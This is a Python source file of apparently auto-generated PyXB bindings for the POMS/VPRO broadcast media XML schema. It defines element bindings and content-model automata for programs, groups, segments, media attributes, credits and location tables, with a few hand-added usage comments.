program = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'program'), programType, documentation='\n        This is the most used entity in POMS. It represents e.g. one broadcast program or one web-only clip. It represents a standalone entity which a consumer can view or listen to.\n      ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 25, 2))
Namespace.addCategoryObject('elementBinding', program.name().localName(), program)
group = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'group'), groupType, documentation='\n        A group collects a number of programs and/or other groups. Examples: season, series, playlist and album.\n      ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 32, 2))
Namespace.addCategoryObject('elementBinding', group.name().localName(), group)
segment = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segment'), segmentType, documentation='\n A program can contain a number of segments. A segment is an identifiable part of a program.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 39, 2))
Namespace.addCategoryObject('elementBinding', segment.name().localName(), segment)
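# Hand-added usage sketch (not generated): with the element bindings above in
# place, an XML document whose root is one of these elements can be parsed
# with the module-level CreateFromDocument helper that PyXB emits near the
# top of a generated bindings module (assumed to be present here as usual).
def _parse_usage_sketch(xml_text):
    obj = CreateFromDocument(xml_text)   # returns e.g. a programType instance for a <program> root
    return obj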
mediaTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'schedule'), scheduleType, scope=mediaTableType, documentation="\n Programs of type 'BROADCAST' can contain schedule events. A schedule indicates on which channel and at what time the program is broadcast. A schedule is a container which contains the schedule events of different programs, for a certain period of time.\n ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 46, 2)))
mediaTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'programTable'), programTableType, scope=mediaTableType, documentation='A table with all program objects in this container', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 59, 6)))
mediaTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'groupTable'), groupTableType, scope=mediaTableType, documentation='A table with all group objects in this container', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 64, 6)))
mediaTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'locationTable'), locationTableType, scope=mediaTableType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 69, 6)))
def _BuildAutomaton ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton
del _BuildAutomaton
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 59, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 64, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 69, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 70, 6))
counters.add(cc_3)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(mediaTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'programTable')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 59, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(mediaTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'groupTable')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 64, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(mediaTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'locationTable')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 69, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(mediaTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'schedule')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 70, 6))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
mediaTableType._Automaton = _BuildAutomaton()
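# Hand-added note (not generated): the automaton built above encodes the
# content model (programTable?, groupTable?, locationTable?, schedule?) of
# mediaTableType as a finite automaton with counters: each cc_N is the 0..1
# occurrence range of one child, and the transitions only admit the children
# in schema order. A sketch of how it is exercised, assuming mediaTableType
# has no further required attributes; never called at import time.
def _mediaTableType_content_model_sketch():
    table = mediaTableType()
    table.programTable = programTableType()   # optional child, at most once
    table.validateBinding()                   # checks the instance against the automaton
    return table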
programTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'program'), programType, scope=programTableType, documentation='\n        This is the most used entity in POMS. It represents e.g. one broadcast program or one web-only clip. It represents a standalone entity which a consumer can view or listen to.\n      ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 25, 2)))
def _BuildAutomaton_ ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_
del _BuildAutomaton_
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 83, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(programTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'program')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 83, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
programTableType._Automaton = _BuildAutomaton_()
portalsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'portal'), organizationType, scope=portalsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 457, 6)))
def _BuildAutomaton_2 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_2
del _BuildAutomaton_2
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 457, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(portalsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'portal')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 457, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
portalsType._Automaton = _BuildAutomaton_2()
avAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'bitrate'), pyxb.binding.datatypes.long, scope=avAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 471, 6)))
avAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'byteSize'), pyxb.binding.datatypes.long, scope=avAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 472, 6)))
avAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'avFileFormat'), avFileFormatEnum, scope=avAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 473, 6)))
avAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'videoAttributes'), videoAttributesType, scope=avAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 474, 6)))
avAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'audioAttributes'), audioAttributesType, scope=avAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 475, 6)))
def _BuildAutomaton_3 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_3
del _BuildAutomaton_3
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 471, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 472, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 473, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 474, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 475, 6))
counters.add(cc_4)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(avAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'bitrate')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 471, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(avAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'byteSize')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 472, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(avAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avFileFormat')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 473, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(avAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'videoAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 474, 6))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(avAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'audioAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 475, 6))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
avAttributesType._Automaton = _BuildAutomaton_3()
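# Hand-added usage sketch (not generated): all children of avAttributesType
# are optional and must appear in schema order. The numeric values are
# invented and 'MP4' is an assumed member of avFileFormatEnum. Never called
# at import time.
def _avAttributesType_usage_sketch():
    av = avAttributesType()
    av.bitrate = 1000000     # bits per second (xs:long)
    av.byteSize = 52428800   # file size in bytes (xs:long)
    av.avFileFormat = 'MP4'  # assumed avFileFormatEnum value
    return av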
videoAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'color'), colorType, scope=videoAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 503, 6)))
videoAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'videoCoding'), pyxb.binding.datatypes.string, scope=videoAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 504, 6)))
videoAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'aspectRatio'), aspectRatioEnum, scope=videoAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 505, 6)))
def _BuildAutomaton_4 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_4
del _BuildAutomaton_4
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 503, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 504, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 505, 6))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(videoAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'color')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 503, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(videoAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'videoCoding')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 504, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(videoAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'aspectRatio')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 505, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
videoAttributesType._Automaton = _BuildAutomaton_4()
audioAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'numberOfChannels'), pyxb.binding.datatypes.short, scope=audioAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 536, 6)))
audioAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'audioCoding'), pyxb.binding.datatypes.string, scope=audioAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 537, 6)))
audioAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'language'), pyxb.binding.datatypes.string, scope=audioAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 538, 6)))
def _BuildAutomaton_5 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_5
del _BuildAutomaton_5
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 536, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 537, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 538, 6))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(audioAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'numberOfChannels')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 536, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(audioAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'audioCoding')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 537, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(audioAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'language')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 538, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
audioAttributesType._Automaton = _BuildAutomaton_5()
creditsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'person'), personType, scope=creditsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 545, 8)))
creditsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'name'), nameType, scope=creditsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 546, 8)))
def _BuildAutomaton_6 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_6
del _BuildAutomaton_6
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 544, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(creditsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'person')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 545, 8))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(creditsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'name')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 546, 8))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
creditsType._Automaton = _BuildAutomaton_6()
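# Hand-added note (not generated): unlike the automata above, _BuildAutomaton_6
# shares a single counter (cc_0) between the <person> and <name> states, so a
# creditsType instance may contain any number of person and name children
# interleaved in any order.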
segmentsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segment'), segmentType, scope=segmentsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 625, 6)))
def _BuildAutomaton_7 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_7
del _BuildAutomaton_7
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 625, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(segmentsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'segment')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 625, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
segmentsType._Automaton = _BuildAutomaton_7()
imagesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(_Namespace_shared, 'image'), _ImportedBinding_npoapi_xml_shared.imageType, scope=imagesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 8, 2)))
def _BuildAutomaton_8 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_8
del _BuildAutomaton_8
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 657, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(imagesType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_shared, 'image')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 657, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
imagesType._Automaton = _BuildAutomaton_8()
groupTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'group'), groupType, scope=groupTableType, documentation='\n          A group collects a number of programs and/or other groups. Examples: season, series, playlist and album.\n        ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 32, 2)))
def _BuildAutomaton_9 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_9
del _BuildAutomaton_9
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(groupTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'group')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 676, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
groupTableType._Automaton = _BuildAutomaton_9()
locationTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'location'), locationType, scope=locationTableType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 706, 6)))
locationTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), scheduleEventType, scope=locationTableType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 707, 6)))
def _BuildAutomaton_10 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_10
del _BuildAutomaton_10
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 706, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 707, 6))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(locationTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'location')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 706, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(locationTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 707, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
